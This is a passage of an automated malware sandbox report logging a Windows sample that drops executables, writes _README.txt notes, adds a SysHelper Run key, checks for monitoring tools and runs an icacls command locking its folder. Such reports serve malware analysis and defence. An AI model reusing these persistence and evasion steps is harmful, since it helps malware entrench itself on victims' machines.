Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_004027BB push edi; ret 0_2_0040276D
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C82822 push edi; ret 0_2_02C827D4
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C825FC push ss; ret 0_2_02C82603
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C827AC push edi; ret 0_2_02C827D4
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C827A2 push edi; ret 0_2_02C827A9
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C815A4 push AFD66869h; ret 0_2_02C815A9
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C8275E push ebx; ret 0_2_02C8277B
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C82754 pushad ; ret 0_2_02C8275B
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C82739 push ebx; ret 0_2_02C82751
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CDDAC0 push 4843A5D1h; retf 0_2_02CDDACC
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CDD9FE push ds; retf 0_2_02CDDA00
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CDDA8A push ecx; retf 0_2_02CDDA8C
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CD716A push AFD66869h; ret 0_2_02CD716F
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CD8277 pushad ; iretd 0_2_02CD8278
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CDDA02 push esi; iretd 0_2_02CDDA04
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CDD81A push eax; iretd 0_2_02CDD81B
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CD8339 push D23524A7h; retn 0006h 0_2_02CD8341
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004026D2 push ebx; ret 5_2_004026EA
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004026ED pushad ; ret 5_2_004026F4
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004026F7 push ebx; ret 5_2_00402714
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_00402745 push edi; ret 5_2_0040276D
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_0040273B push edi; ret 5_2_00402742
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_00402595 push ss; ret 5_2_0040259C
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_004027BB push edi; ret 5_2_0040276D
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_02D52822 push edi; ret 5_2_02D527D4
Source: filename.exe.20.dr Static PE information: section name: entropy: 7.956609638771825
Source: updater.exe.45.dr Static PE information: section name: entropy: 7.956609638771825

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\filename.exe File created: C:\ProgramData\Google\Chrome\updater.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe File created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\uthsueb Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\filename.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A5B6.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C12E.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D3CC.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\filename.exe File created: C:\ProgramData\Google\Chrome\updater.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\uthsueb Jump to dropped file
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe File created: C:\Users\user\_README.txt

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\filename.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\filename.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\filename.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\filename.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\filename.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\filename.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\mdeerbwvqe.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\uthsueb:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Memory written: PID: 6596 base: 1780005 value: E9 8B 2F 78 75
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Memory written: PID: 6596 base: 76F02F90 value: E9 7A D0 87 8A
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 10_2_00481920
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D3CC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
